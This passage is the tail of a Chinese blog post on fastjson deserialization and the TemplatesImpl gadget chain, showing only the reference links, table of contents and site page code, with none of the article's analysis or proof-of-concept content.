<h1 id="0x06、参考链接"><a href="#0x06、参考链接" class="headerlink" title="0x06、参考链接"></a>0x06、参考链接</h1><p><a target="_blank" rel="noopener" href="https://github.com/alibaba/fastjson/wiki/Quick-Start-CN">https://github.com/alibaba/fastjson/wiki/Quick-Start-CN</a><br><a target="_blank" rel="noopener" href="https://www.w3cschool.cn/fastjson/">https://www.w3cschool.cn/fastjson/</a><br><a target="_blank" rel="noopener" href="https://www.yuque.com/tianxiadamutou/zcfd4v/rwx6sb">https://www.yuque.com/tianxiadamutou/zcfd4v/rwx6sb</a><br><a target="_blank" rel="noopener" href="https://y4er.com/posts/fastjson-learn/">https://y4er.com/posts/fastjson-learn/</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/40ba40f0.html" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2023-01-04 16:15:00
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/Java%E5%AE%89%E5%85%A8/" title="Java安全">
                        #Java安全
                      </a>
                    </span>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/java%E5%88%A9%E7%94%A8%E9%93%BE/" title="java利用链">
                        #java利用链
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/posts/9fa41563.html" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00%E3%80%81%E5%89%8D%E8%A8%80"><span class="toc-text">0x00、前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01%E3%80%81fastjson%E6%8F%8F%E8%BF%B0"><span class="toc-text">0x01、fastjson描述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02%E3%80%81fastjson%E7%AE%80%E5%8D%95%E4%BD%BF%E7%94%A8"><span class="toc-text">0x02、fastjson简单使用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96-toJSONString"><span class="toc-text">序列化-toJSONString()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-parseObject-%E3%80%81parse-%E3%80%81parseArray"><span class="toc-text">反序列化-parseObject()、parse()、parseArray()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getter-x2F-setter%E8%87%AA%E5%8A%A8%E8%B0%83%E7%94%A8"><span class="toc-text">getter&#x2F;setter自动调用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#get%E6%96%B9%E6%B3%95%E8%B0%83%E7%94%A8"><span class="toc-text">get方法调用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#set%E6%96%B9%E6%B3%95%E3%80%81%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95%E8%B0%83%E7%94%A8"><span class="toc-text">set方法、构造方法调用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#getter-x2F-setter%E8%8E%B7%E5%8F%96"><span class="toc-text">getter&#x2F;setter获取</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#setter%E6%9E%84%E5%BB%BA"><span class="toc-text">setter构建</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#getter%E6%9E%84%E5%BB%BA"><span class="toc-text">getter构建</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03%E3%80%81TemplatesImpl%E7%9F%A5%E8%AF%86%E5%9B%9E%E9%A1%BE"><span class="toc-text">0x03、TemplatesImpl知识回顾</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ClassLoader-defineClass"><span class="toc-text">ClassLoader#defineClass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TemplatesImpl"><span class="toc-text">TemplatesImpl</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#defineTransletClasses"><span class="toc-text">defineTransletClasses()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#getTransletInstance"><span class="toc-text">getTransletInstance()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#newTransformer"><span class="toc-text">newTransformer()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#getOutputProperties"><span class="toc-text">getOutputProperties()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4%E9%93%BE"><span class="toc-text">完整链</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0demo"><span class="toc-text">实现demo</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04%E3%80%81fastjson-TemplatesImpl%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90"><span class="toc-text">0x04、fastjson-TemplatesImpl利用分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90%E8%BF%87%E7%A8%8B"><span class="toc-text">分析过程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%81%E7%A8%8B%E6%80%BB%E7%BB%93"><span class="toc-text">流程总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#base64%E7%BC%96%E7%A0%81%E9%97%AE%E9%A2%98"><span class="toc-text">base64编码问题</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05%E3%80%81%E6%80%BB%E7%BB%93"><span class="toc-text">0x05、总结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x06%E3%80%81%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-text">0x06、参考链接</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        




  
    <script async type="text/javascript" src="/plugins/valine.min.js" onload="loadValineSuc(this)"></script>
  

  <div id="vcomments"></div>

  <script>
    function loadValineSuc() {
      new Valine({
        el: '#vcomments',
        appId: '5WzQHrZA6gNtoCZa9qWZkFjv-gzGzoHsz',
        appKey: 'O1mOg3eUPYzPIUYEaX54ip6s',
        placeholder: 'here',
        avatar: 'monsterid',
        lang: 'zh-CN'
      })
    }
  </script>

    <style>
      .comments-container .v .vempty {
        display: none!important;
      }
    </style>




      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Okaytc">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="https://okaytc.github.io/">Copyright © Okaytc 2022</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a href="https://okaytc.github.io/">一个热爱健身的脚本小子</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + java%E5%AE%89%E5%85%A8-fastjson%E5%8F%8A%E5%85%B6TemplatesImpl%E9%93%BE%E5%AD%A6%E4%B9%A0%E4%B8%8E%E5%88%86%E6%9E%90 + '&url=' + https%3A%2F%2Fokaytc.github.io%2Fposts%2Fad3be047.html + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://okaytc.github.io/posts/ad3be047.html" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
